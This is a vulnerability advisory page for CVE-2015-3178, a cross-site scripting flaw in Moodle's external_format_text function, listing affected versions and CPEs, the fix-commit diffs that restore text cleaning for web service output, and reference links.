Low severityNVD Advisory· Published Jun 1, 2015· Updated May 6, 2026
CVE-2015-3178
CVE-2015-3178
Description
Cross-site scripting (XSS) vulnerability in the external_format_text function in lib/externallib.php in Moodle through 2.5.9, 2.6.x before 2.6.11, 2.7.x before 2.7.8, and 2.8.x before 2.8.6 allows remote authenticated users to inject arbitrary web script or HTML into an external application via a crafted string that is visible to web services.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
moodle/moodlePackagist | < 2.6.11 | 2.6.11 |
moodle/moodlePackagist | >= 2.7.0, < 2.7.8 | 2.7.8 |
moodle/moodlePackagist | >= 2.8.0, < 2.8.6 | 2.8.6 |
Affected products
35cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*+ 34 more
- cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*range: <=2.5.9
- cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.10:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.9:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.6:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.7:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.5:*:*:*:*:*:*:*
Patches
62c7d13dba37aMDL-49718 externallib: unittest correction
1 file changed · +4 −2
course/tests/externallib_test.php+4 −2 modified@@ -225,7 +225,8 @@ public function test_get_categories() { $generatedcat = $generatedcats[$category['id']]; $this->assertEquals($category['idnumber'], $generatedcat->idnumber); $this->assertEquals($category['name'], $generatedcat->name); - $this->assertEquals($category['description'], $generatedcat->description); + // Description was converted to the HTML format. + $this->assertEquals($category['description'], format_text($generatedcat->description, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($category['descriptionformat'], FORMAT_HTML); } @@ -530,7 +531,8 @@ public function test_get_courses () { $dbcourse = $generatedcourses[$course['id']]; $this->assertEquals($course['idnumber'], $dbcourse->idnumber); $this->assertEquals($course['fullname'], $dbcourse->fullname); - $this->assertEquals($course['summary'], $dbcourse->summary); + // Summary was converted to the HTML format. + $this->assertEquals($course['summary'], format_text($dbcourse->summary, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($course['summaryformat'], FORMAT_HTML); $this->assertEquals($course['shortname'], $dbcourse->shortname); $this->assertEquals($course['categoryid'], $dbcourse->category);
7f5bd0da0e25MDL-49718 externallib: unittest correction
1 file changed · +4 −2
course/tests/externallib_test.php+4 −2 modified@@ -225,7 +225,8 @@ public function test_get_categories() { $generatedcat = $generatedcats[$category['id']]; $this->assertEquals($category['idnumber'], $generatedcat->idnumber); $this->assertEquals($category['name'], $generatedcat->name); - $this->assertEquals($category['description'], $generatedcat->description); + // Description was converted to the HTML format. + $this->assertEquals($category['description'], format_text($generatedcat->description, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($category['descriptionformat'], FORMAT_HTML); } @@ -531,7 +532,8 @@ public function test_get_courses () { $dbcourse = $generatedcourses[$course['id']]; $this->assertEquals($course['idnumber'], $dbcourse->idnumber); $this->assertEquals($course['fullname'], $dbcourse->fullname); - $this->assertEquals($course['summary'], $dbcourse->summary); + // Summary was converted to the HTML format. + $this->assertEquals($course['summary'], format_text($dbcourse->summary, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($course['summaryformat'], FORMAT_HTML); $this->assertEquals($course['shortname'], $dbcourse->shortname); $this->assertEquals($course['categoryid'], $dbcourse->category);
b4da1e0ae4f6MDL-49718 externallib: unittest correction
1 file changed · +4 −2
course/tests/externallib_test.php+4 −2 modified@@ -225,7 +225,8 @@ public function test_get_categories() { $generatedcat = $generatedcats[$category['id']]; $this->assertEquals($category['idnumber'], $generatedcat->idnumber); $this->assertEquals($category['name'], $generatedcat->name); - $this->assertEquals($category['description'], $generatedcat->description); + // Description was converted to the HTML format. + $this->assertEquals($category['description'], format_text($generatedcat->description, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($category['descriptionformat'], FORMAT_HTML); } @@ -531,7 +532,8 @@ public function test_get_courses () { $dbcourse = $generatedcourses[$course['id']]; $this->assertEquals($course['idnumber'], $dbcourse->idnumber); $this->assertEquals($course['fullname'], $dbcourse->fullname); - $this->assertEquals($course['summary'], $dbcourse->summary); + // Summary was converted to the HTML format. + $this->assertEquals($course['summary'], format_text($dbcourse->summary, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($course['summaryformat'], FORMAT_HTML); $this->assertEquals($course['shortname'], $dbcourse->shortname); $this->assertEquals($course['categoryid'], $dbcourse->category);
77067fbb3a24MDL-49718 webservices: Fix forced format and force external text cleaning
1 file changed · +3 −4
lib/externallib.php+3 −4 modified@@ -712,7 +712,7 @@ function external_validate_format($format) { * All web service servers must set this singleton when parsing the $_GET and $_POST. * * @param string $text The content that may contain ULRs in need of rewriting. - * @param int $textformat The text format, by default FORMAT_HTML. + * @param int $textformat The text format. * @param int $contextid This parameter and the next two identify the file area to use. * @param string $component * @param string $filearea helps identify the file area. @@ -732,9 +732,8 @@ function external_format_text($text, $textformat, $contextid, $component, $filea } if (!$settings->get_raw()) { - $textformat = FORMAT_HTML; // Force format to HTML when not raw. - $text = format_text($text, $textformat, - array('noclean' => true, 'para' => false, 'filter' => $settings->get_filter())); + $text = format_text($text, $textformat, array('para' => false, 'filter' => $settings->get_filter())); + $textformat = FORMAT_HTML; // Once converted to html (from markdown, plain... lets inform consumer this is already HTML). } return array($text, $textformat);
d62d36c657a5MDL-49718 webservices: Fix forced format and force external text cleaning
1 file changed · +3 −4
lib/externallib.php+3 −4 modified@@ -706,7 +706,7 @@ function external_validate_format($format) { * All web service servers must set this singleton when parsing the $_GET and $_POST. * * @param string $text The content that may contain ULRs in need of rewriting. - * @param int $textformat The text format, by default FORMAT_HTML. + * @param int $textformat The text format. * @param int $contextid This parameter and the next two identify the file area to use. * @param string $component * @param string $filearea helps identify the file area. @@ -726,9 +726,8 @@ function external_format_text($text, $textformat, $contextid, $component, $filea } if (!$settings->get_raw()) { - $textformat = FORMAT_HTML; // Force format to HTML when not raw. - $text = format_text($text, $textformat, - array('noclean' => true, 'para' => false, 'filter' => $settings->get_filter())); + $text = format_text($text, $textformat, array('para' => false, 'filter' => $settings->get_filter())); + $textformat = FORMAT_HTML; // Once converted to html (from markdown, plain... lets inform consumer this is already HTML). } return array($text, $textformat);
28947c1d7d9cMDL-49718 webservices: Fix forced format and force external text cleaning
1 file changed · +3 −4
lib/externallib.php+3 −4 modified@@ -712,7 +712,7 @@ function external_validate_format($format) { * All web service servers must set this singleton when parsing the $_GET and $_POST. * * @param string $text The content that may contain ULRs in need of rewriting. - * @param int $textformat The text format, by default FORMAT_HTML. + * @param int $textformat The text format. * @param int $contextid This parameter and the next two identify the file area to use. * @param string $component * @param string $filearea helps identify the file area. @@ -732,9 +732,8 @@ function external_format_text($text, $textformat, $contextid, $component, $filea } if (!$settings->get_raw()) { - $textformat = FORMAT_HTML; // Force format to HTML when not raw. - $text = format_text($text, $textformat, - array('noclean' => true, 'para' => false, 'filter' => $settings->get_filter())); + $text = format_text($text, $textformat, array('para' => false, 'filter' => $settings->get_filter())); + $textformat = FORMAT_HTML; // Once converted to html (from markdown, plain... lets inform consumer this is already HTML). } return array($text, $textformat);
Vulnerability mechanics
Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
14- github.com/advisories/GHSA-9fmw-m4qx-6cq8ghsaADVISORY
- moodle.org/mod/forum/discuss.phpnvdVendor AdvisoryWEB
- nvd.nist.gov/vuln/detail/CVE-2015-3178ghsaADVISORY
- openwall.com/lists/oss-security/2015/05/18/1nvdWEB
- github.com/moodle/moodle/commit/28947c1d7d9c53781989b9da7ceb2cafdd144749ghsaWEB
- github.com/moodle/moodle/commit/2c7d13dba37aa0c850c62037b951efd6dc1b0f78ghsaWEB
- github.com/moodle/moodle/commit/77067fbb3a248ac2f1fa4b3c20e5b81f768940e5ghsaWEB
- github.com/moodle/moodle/commit/7f5bd0da0e25feb3b6da3908b6672a58af82e12fghsaWEB
- github.com/moodle/moodle/commit/b4da1e0ae4f63ef0bb14b8bf5c0b86cd00f2af4bghsaWEB
- github.com/moodle/moodle/commit/d62d36c657a5df45ee286722490abb7901381da6ghsaWEB
- web.archive.org/web/20200228054910/http://www.securityfocus.com/bid/74726ghsaWEB
- web.archive.org/web/20201201000000*/http://www.securitytracker.com/id/1032358ghsaWEB
- www.securityfocus.com/bid/74726nvd
- www.securitytracker.com/id/1032358nvd
News mentions
0No linked articles in our index yet.